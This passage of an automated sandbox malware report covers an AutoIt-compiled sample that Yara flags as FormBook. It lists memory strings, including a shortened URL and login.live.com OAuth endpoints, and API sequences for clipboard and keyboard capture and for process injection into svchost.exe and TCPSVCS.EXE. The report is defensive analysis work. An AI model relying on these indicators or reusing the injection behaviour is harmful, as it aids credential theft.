                Source: TCPSVCS.EXE, 00000005.00000003.1956275486.00000000073AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: TCPSVCS.EXE, 00000005.00000002.3901472005.0000000002959000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: TCPSVCS.EXE, 00000005.00000002.3901472005.0000000002959000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: TCPSVCS.EXE, 00000005.00000003.1940163045.000000000738B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: TCPSVCS.EXE, 00000005.00000002.3901472005.0000000002959000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: TCPSVCS.EXE, 00000005.00000002.3901472005.0000000002959000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033Y
                Source: TCPSVCS.EXE, 00000005.00000002.3901472005.0000000002959000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: TCPSVCS.EXE, 00000005.00000002.3901472005.0000000002959000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000030C6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://shorty.bio/zSKcZ7
                Source: TCPSVCS.EXE, 00000005.00000003.1956275486.00000000073AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: TCPSVCS.EXE, 00000005.00000002.3904938820.0000000004110000.00000004.10000000.00040000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000038A0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fastmail.help/hc/en-us/articles/1500000280141
                Source: TCPSVCS.EXE, 00000005.00000002.3904938820.0000000004110000.00000004.10000000.00040000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000038A0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fastmailusercontent.com/filestorage/css/main.css
                Source: TCPSVCS.EXE, 00000005.00000003.1956275486.00000000073AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: TCPSVCS.EXE, 00000005.00000002.3904938820.0000000003936000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3906452676.0000000005920000.00000004.00000800.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000030C6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.livechatinc.com/?welcome
                Source: TCPSVCS.EXE, 00000005.00000002.3904938820.0000000003936000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3906452676.0000000005920000.00000004.00000800.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000030C6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.livechatinc.com/chat-with/13793973/
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0064EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0064EAFF
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0064ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0064ED6A
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0064EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0064EAFF
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0063AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0063AA57
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_00669576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00669576

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3900696034.0000000002600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3900973185.0000000002790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1724553623.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1724963912.0000000003790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3905770259.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1725326786.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3900101760.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3902676049.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: ofZiNLLKZU.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: ofZiNLLKZU.exe, 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_76f2b39c-c
                Source: ofZiNLLKZU.exe, 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_83ebe0f4-d
                Source: ofZiNLLKZU.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e1f62201-c
                Source: ofZiNLLKZU.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_630590d1-0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C5B3 NtClose,2_2_0042C5B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72B60 NtClose,LdrInitializeThunk,2_2_03A72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03A72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03A72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A735C0 NtCreateMutant,LdrInitializeThunk,2_2_03A735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A74340 NtSetContextThread,2_2_03A74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A74650 NtSuspendThread,2_2_03A74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BA0 NtEnumerateValueKey,2_2_03A72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72B80 NtQueryInformationFile,2_2_03A72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BE0 NtQueryValueKey,2_2_03A72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BF0 NtAllocateVirtualMemory,2_2_03A72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72AB0 NtWaitForSingleObject,2_2_03A72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72AF0 NtWriteFile,2_2_03A72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72AD0 NtReadFile,2_2_03A72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72FA0 NtQuerySection,2_2_03A72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72FB0 NtResumeThread,2_2_03A72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72F90 NtProtectVirtualMemory,2_2_03A72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72FE0 NtCreateFile,2_2_03A72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72F30 NtCreateSection,2_2_03A72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72F60 NtCreateProcessEx,2_2_03A72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72EA0 NtAdjustPrivilegesToken,2_2_03A72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72E80 NtReadVirtualMemory,2_2_03A72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72EE0 NtQueueApcThread,2_2_03A72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72E30 NtWriteVirtualMemory,2_2_03A72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DB0 NtEnumerateKey,2_2_03A72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DD0 NtDelayExecution,2_2_03A72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D30 NtUnmapViewOfSection,2_2_03A72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D00 NtSetInformationFile,2_2_03A72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D10 NtMapViewOfSection,2_2_03A72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CA0 NtQueryInformationToken,2_2_03A72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CF0 NtOpenProcess,2_2_03A72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CC0 NtQueryVirtualMemory,2_2_03A72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C00 NtQueryInformationProcess,2_2_03A72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C60 NtCreateKey,2_2_03A72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73090 NtSetValueKey,2_2_03A73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73010 NtOpenDirectoryObject,2_2_03A73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A739B0 NtGetContextThread,2_2_03A739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73D10 NtOpenProcessToken,2_2_03A73D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73D70 NtOpenThread,2_2_03A73D70
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E04340 NtSetContextThread,LdrInitializeThunk,5_2_02E04340
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E04650 NtSuspendThread,LdrInitializeThunk,5_2_02E04650
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02AF0 NtWriteFile,LdrInitializeThunk,5_2_02E02AF0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02AD0 NtReadFile,LdrInitializeThunk,5_2_02E02AD0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02BE0 NtQueryValueKey,LdrInitializeThunk,5_2_02E02BE0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_02E02BF0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_02E02BA0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02B60 NtClose,LdrInitializeThunk,5_2_02E02B60
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02EE0 NtQueueApcThread,LdrInitializeThunk,5_2_02E02EE0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_02E02E80
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02FE0 NtCreateFile,LdrInitializeThunk,5_2_02E02FE0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02FB0 NtResumeThread,LdrInitializeThunk,5_2_02E02FB0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02F30 NtCreateSection,LdrInitializeThunk,5_2_02E02F30
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_02E02CA0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02C60 NtCreateKey,LdrInitializeThunk,5_2_02E02C60
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_02E02C70
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_02E02DF0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02DD0 NtDelayExecution,LdrInitializeThunk,5_2_02E02DD0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_02E02D30
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02D10 NtMapViewOfSection,LdrInitializeThunk,5_2_02E02D10
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E035C0 NtCreateMutant,LdrInitializeThunk,5_2_02E035C0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E039B0 NtGetContextThread,LdrInitializeThunk,5_2_02E039B0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02AB0 NtWaitForSingleObject,5_2_02E02AB0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02B80 NtQueryInformationFile,5_2_02E02B80
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02EA0 NtAdjustPrivilegesToken,5_2_02E02EA0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02E30 NtWriteVirtualMemory,5_2_02E02E30
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02FA0 NtQuerySection,5_2_02E02FA0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02F90 NtProtectVirtualMemory,5_2_02E02F90
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02F60 NtCreateProcessEx,5_2_02E02F60
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02CF0 NtOpenProcess,5_2_02E02CF0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02CC0 NtQueryVirtualMemory,5_2_02E02CC0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02C00 NtQueryInformationProcess,5_2_02E02C00
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02DB0 NtEnumerateKey,5_2_02E02DB0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02D00 NtSetInformationFile,5_2_02E02D00
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E03090 NtSetValueKey,5_2_02E03090
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E03010 NtOpenDirectoryObject,5_2_02E03010
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E03D70 NtOpenThread,5_2_02E03D70
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E03D10 NtOpenProcessToken,5_2_02E03D10
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00159010 NtCreateFile,5_2_00159010
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00159170 NtReadFile,5_2_00159170
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00159260 NtDeleteFile,5_2_00159260
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00159300 NtClose,5_2_00159300
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00159450 NtAllocateVirtualMemory,5_2_00159450
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02A3F08B NtQueryInformationProcess,5_2_02A3F08B
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02A3F1BE NtReadVirtualMemory,5_2_02A3F1BE
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02A3F88D NtUnmapViewOfSection,5_2_02A3F88D
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0063D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0063D5EB
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_00631201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00631201
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0063E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0063E8F6
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005DBF400_2_005DBF40
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_006420460_2_00642046
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005D80600_2_005D8060
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_006382980_2_00638298
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0060E4FF0_2_0060E4FF
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0060676B0_2_0060676B
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_006648730_2_00664873
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005DCAF00_2_005DCAF0
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005FCAA00_2_005FCAA0
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005ECC390_2_005ECC39
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_00606DD90_2_00606DD9
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005EB1190_2_005EB119
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005D91C00_2_005D91C0
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005F13940_2_005F1394
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005F17060_2_005F1706
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005F781B0_2_005F781B
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005E997D0_2_005E997D
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005D79200_2_005D7920
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005F19B00_2_005F19B0
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005F7A4A0_2_005F7A4A
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005F1C770_2_005F1C77
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005F7CA70_2_005F7CA7
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0065BE440_2_0065BE44
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_00609EEE0_2_00609EEE
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005F1F320_2_005F1F32
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_01A6B5E80_2_01A6B5E8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004185832_2_00418583
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004030302_2_00403030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010DC2_2_004010DC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E17C2_2_0040E17C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1272_2_0040E127
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1332_2_0040E133
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011C02_2_004011C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EBA32_2_0042EBA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004024802_2_00402480
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FDCB2_2_0040FDCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FDD32_2_0040FDD3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004027602_2_00402760
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041677E2_2_0041677E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DFE32_2_0040DFE3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FFF32_2_0040FFF3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004167832_2_00416783
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F02_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B003E62_2_03B003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFA3522_2_03AFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC02C02_2_03AC02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE02742_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF41A22_2_03AF41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B001AA2_2_03B001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF81CC2_2_03AF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A301002_2_03A30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA1182_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC81582_2_03AC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD20002_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3C7C02_2_03A3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A407702_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A647502_2_03A64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5C6E02_2_03A5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B005912_2_03B00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A405352_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEE4F62_2_03AEE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE44202_2_03AE4420
